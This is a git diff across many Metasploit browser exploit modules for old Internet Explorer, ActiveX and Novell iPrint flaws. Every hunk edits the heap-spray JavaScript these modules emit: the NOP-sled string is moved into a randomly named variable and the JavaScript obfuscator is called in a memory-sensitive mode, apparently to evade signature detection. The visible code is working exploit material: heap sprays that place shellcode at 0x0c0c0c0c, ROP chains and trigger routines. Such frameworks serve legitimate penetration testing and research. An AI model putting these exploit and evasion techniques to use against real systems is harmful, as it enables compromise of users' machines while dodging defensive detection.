diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb
index 21ab6f6883..5ee4324d84 100644
--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -94,11 +94,14 @@ class MetasploitModule < Msf::Exploit::Remote
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = %Q|
     function heap_spray() {
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       @heap_spray_func = js.sym("heap_spray")
     end
 
diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb
index bce377c85a..7942c168aa 100644
--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -118,11 +118,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
@@ -141,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_pivot = ::Rex::Exploitation::JSObfu.new(js_pivot)
-      js_pivot.obfuscate
+      js_pivot.obfuscate(memory_sensitive: true)
     end
 
     vsd_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb
index e5c76f5f45..2ea585ccbe 100644
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -270,9 +270,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if datastore['OBFUSCATE']
-      spray   = ::Rex::Exploitation::JSObfu.new(spray).obfuscate
+      spray   = ::Rex::Exploitation::JSObfu.new(spray).obfuscate(memory_sensitive: true)
       trigger = ::Rex::Exploitation::JSObfu.new(trigger)
-      trigger.obfuscate
+      trigger.obfuscate(memory_sensitive: true)
       trigger_fn = trigger.sym('trigger')
     else
       trigger_fn = 'trigger'
@@ -336,6 +336,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     shellcode = Rex::Text.to_unescape(code)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     # 1. Create  big block of nops
     # 2. Compose one block which is nops + shellcode
     # 3. Repeat the block
@@ -345,7 +348,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{shellcode}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops+= nops;
     var shellcode =  nops.substring(0,0x800 - code.length) + code;
diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
index 1565cfd1a2..62e2c4323f 100644
--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -246,7 +246,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
-      spray_trigger_js.obfuscate
+      spray_trigger_js.obfuscate(memory_sensitive: true)
     end
 
     # build html
diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
index 74b90589b2..90e37e7ebe 100644
--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -158,13 +158,15 @@ class MetasploitModule < Msf::Exploit::Remote
     js_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))
     js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
     var rop_chain = unescape("#{js_rop}");
     var random = unescape("#{js_padding}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (random.length < 0x80000) random += random;
     while (nops.length < 0x80000) nops += nops;
@@ -193,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
 
       trigger_f = rand_text_alpha(rand(5) + 4)
       feng_shui_f = rand_text_alpha(rand(5) + 4)
diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
index b5239e830d..47101bfd9e 100644
--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -84,12 +84,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -105,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
 
     end
 
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
index 885ac179c4..004fe42cbd 100644
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -102,13 +102,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 8
     js = %Q|
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{js_code}");
-var nops = unescape("#{js_nops}");
+var #{randnop} = "#{js_nops}";
+var nops = unescape(#{randnop});
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, #{my_target['Offset']});
 var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -124,7 +126,7 @@ for (var i=1; i < 0x300; i++) {
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
@@ -243,7 +245,7 @@ function exploit(){
 
     if datastore['OBFUSCATE']
       js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
+      js_trigger.obfuscate(memory_sensitive: true)
       create_rects_func = js_trigger.sym("createRects")
       exploit_func = js_trigger.sym("exploit")
     end
@@ -330,7 +332,7 @@ function exploit(){
 
     if datastore['OBFUSCATE']
       js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
+      js_trigger.obfuscate(memory_sensitive: true)
       create_rects_func = js_trigger.sym("createRects")
       exploit_func = js_trigger.sym("exploit")
     end
diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb
index 7619fe4381..e27a0ca5f4 100644
--- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb
+++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index e14b3daa1f..4634504823 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -194,11 +194,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -222,13 +224,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -286,7 +292,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var rop = unescape("#{js_rop}");
     var code = unescape("#{js_code}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops_90.length < 0x80000) nops_90 += nops_90;
 
@@ -340,7 +347,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     object_id = rand_text_alpha(4)
diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb
index acf55f4103..c3179e1528 100644
--- a/modules/exploits/windows/browser/nis2004_antispam.rb
+++ b/modules/exploits/windows/browser/nis2004_antispam.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--
diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
index 804fabe0b5..9eb78c16fb 100644
--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
-      js_click_link.obfuscate
+      js_click_link.obfuscate(memory_sensitive: true)
       js_click_link_fn = js_click_link.sym('clickLink')
     else
       js_click_link_fn = 'clickLink'
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index 476482238c..7b4a6677fd 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -112,6 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -141,7 +142,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -160,7 +162,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -178,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
index a29b94d870..cb5b13429f 100644
--- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb
+++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
@@ -110,11 +110,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb
index 30da71cc5d..463856afcb 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb
@@ -74,13 +74,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
       <html>
       <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
index 854f7a82ef..1f0b3be14d 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
@@ -109,15 +109,17 @@ class MetasploitModule < Msf::Exploit::Remote
     j_fillblock  = rand_text_alpha(rand(100) + 1)
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
-    j_op	     = rand_text_alpha(rand(100) + 1)
-    j_dbg	     = rand_text_alpha(rand(100) + 1)
+    j_op	 = rand_text_alpha(rand(100) + 1)
+    j_dbg	 = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ienipp}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
index 3d7a10427b..e49adc5070 100644
--- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
@@ -76,12 +76,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
index 227f87d749..497949efba 100644
--- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
@@ -86,12 +86,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index efafd980ba..081405daa4 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -156,6 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -183,7 +184,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -205,11 +207,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -301,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     # The overflow occurs after strcat'ing controlled data to
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index 6f92173203..55a56558ba 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -76,11 +76,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -138,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     address = 0x0c0c0c0c / 0x134
diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
index 2ea5aafde4..0f7b0c675f 100644
--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -131,11 +131,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops, js_counter)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -160,11 +162,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_code, js_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 
@@ -194,6 +198,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops, js_90_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -221,8 +227,10 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 
@@ -360,7 +368,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     if my_target['Rop'].nil?
diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
index 2adb7c4dab..acc6f39377 100644
--- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
+++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|
       <html>
       <body>
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index 639f5fd085..59de7c6009 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -94,11 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
-    j_txt	     = rand_text_alpha(rand(8) + 4)
+    j_txt        = rand_text_alpha(rand(8) + 4)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     js = <<-EOS
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while(#{j_nops}.length < #{j_slackspace}) {
@@ -125,7 +127,7 @@ EOS
     #JS obfuscation on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       main_sym = js.sym('main')
     else
       main_sym = "main"
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index b8de48797f..5251a279ae 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -115,6 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -144,7 +145,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -163,7 +165,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -181,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
index 45aa9c8c94..4cc5d6b69a 100644
--- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb
+++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
@@ -73,6 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     var_nopsled   = rand_text_alpha(rand(6)+3)
     spray_func    = rand_text_alpha(rand(6)+3)
     obj_id        = rand_text_alpha(rand(6)+3)
+    randnop       = rand_text_alpha(rand(100) + 1)
     html = <<-EOS
 <html>
 <head>
